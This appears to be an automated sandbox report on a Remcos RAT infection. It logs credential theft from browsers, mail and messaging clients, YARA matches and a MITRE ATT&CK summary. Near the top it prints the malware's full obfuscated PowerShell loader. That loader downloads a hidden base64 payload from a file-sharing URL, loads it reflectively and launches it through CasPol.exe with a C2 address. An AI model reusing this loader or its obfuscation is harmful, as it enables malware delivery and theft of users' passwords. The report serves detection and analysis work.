jevntmxljunkycwmi40mziumjcxly86chr0afpnnswgwk01jysnzgvzyxrpdmfkb1pnnswgwk01zgvzyxrpdmfkb1pnnswgwk01zgvzyxrpdmfkb1pnjysnnswgwk01q2fzug9swk01lcbattvkzxnhdgl2ywrvwk01lcbattvkzxnhdgl2ywrvwk01lfpnnwrlc2f0axzhzg9attuswicrj001zgvzyxrpdmfkb1onkydnnsxattvkzxnhdgl2ywrvjysnwk0nkyc1lfpnnwrlc2f0axzhzg9attuswk01zgvzyxrpdmfkjysnb1pnnscrjyxattuxwk01lfpnnwrlc2f0axzhzg9attupktsnksaglvjlugxhy0ugichby2hhcl0xmtarw2noyxjdnjkrw2noyxjdmte0ksxby2hhcl0zni1dumvwbefjrsagj1pnnscsw2noyxjdmzkgic1szvbsywnfkftjagfyxtc0k1tjagfyxtczk1tjagfyxtu0ksxby2hhcl0xmjqpfcygkcakcfnit01fwzrdkyrqu2hptuvbmzbdkyd4jyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nerimageurl = zm5https://3105.filemail.com/api/file/get?fil'+'ekey=shtphbcpx8o-lotcqhlg6_0xcy-xl4tnxlavbq9'+'5-'+'dvitk5carandq'+'jbb3mexfwqzkmtxg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c z'+'m5;nerwe'+'bclient = new-object system.net.webc'+'lient;nerimagebytes = nerwebclient.downloaddata('+'nerimageurl);nerimagetext = ['+'system.text.encoding]::utf8.getstr'+'ing(nerimageby'+'tes);nerstartflag ='+' zm5<<base64_start>>zm5'+';nerendflag = zm5<<base64_'+'end>>zm5;nerstartindex = nerimagetex'+'t.indexof(nerstartflag);nerendind'+'ex = nerimagetext.indexof('+'nerendflag);ne'+'rstartin'+'dex -ge 0 -and nerendindex -gt nerstartindex;nerstartindex += nerstartflag.length;nerbase64'+'l'+'ength = nerendinde'+'x - nersta'+'rtindex;nerbase64command = nerimagetext.substring(nerstartindex, nerbase64length'+');nerbase64reversed = -join (nerba'+'se64command.tochararray() ji6 foreach'+'-object { ner_ })[-1..-(nerbase64command.length)];nercommandbytes = [system.convert]::'+'frombas'+'e64string(nerbase64reversed);nerloadedassembly = [system.reflection.assembly]::load(nercommandbytes);nervaimethod = [dnlib.io.home].getmethod'+'(zm5vaizm5);nervaimethod.invoke(nernull, @(zm5txt.rsrvrs/'+'4421/531.5'+'02.432.271//:ptthzm5, zm5'+'desativadozm5, zm5desativadozm5, zm5desativadozm'+'5, zm5caspolzm5, zm5desativadozm5, zm5desativadozm5,zm5desativadozm5,z'+'m5desativadoz'+'m5,zm5desativado'+'zm'+'5,zm5desativadozm5,zm5desativad'+'ozm5'+',zm51zm5,zm5desativadozm5));') -replace ([char]110+[char]69+[char]114),[char]36-creplace 'zm5',[char]39 -replace([char]74+[char]73+[char]54),[char]124)|& ( $pshome[4]+$pshome[30]+'x')"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_00433E0A cpuid 35_2_00433E0A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,35_2_004470AE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,35_2_004510BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,35_2_004511E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,35_2_004512EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,35_2_004513B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,35_2_00447597
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,35_2_0040E679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,GetLocaleInfoW,35_2_00450A7F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,35_2_00450CF7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,35_2_00450D42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,35_2_00450DDD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,35_2_00450E6A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,30_2_0041881C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,31_2_004082CD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 35_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,35_2_0044800F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_0041739B GetVersionExW,30_2_0041739B
                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000023.00000002.543234045.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTR
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data35_2_0040B21B
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\35_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db35_2_0040B335
                  Searches for Windows Mail specific files
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Tries to steal Mail credentials (via file registry)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: ESMTPPassword31_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword31_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword31_2_00402DB3
                  Yara detected WebBrowserPassView password recovery tool
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3120, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-H42H13
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-H42H13
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 35.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 35.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000023.00000002.543234045.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3784, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe35_2_00405042

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information121
                  Scripting                  		Valid Accounts11
                  Native API                  		121
                  Scripting                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		13
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
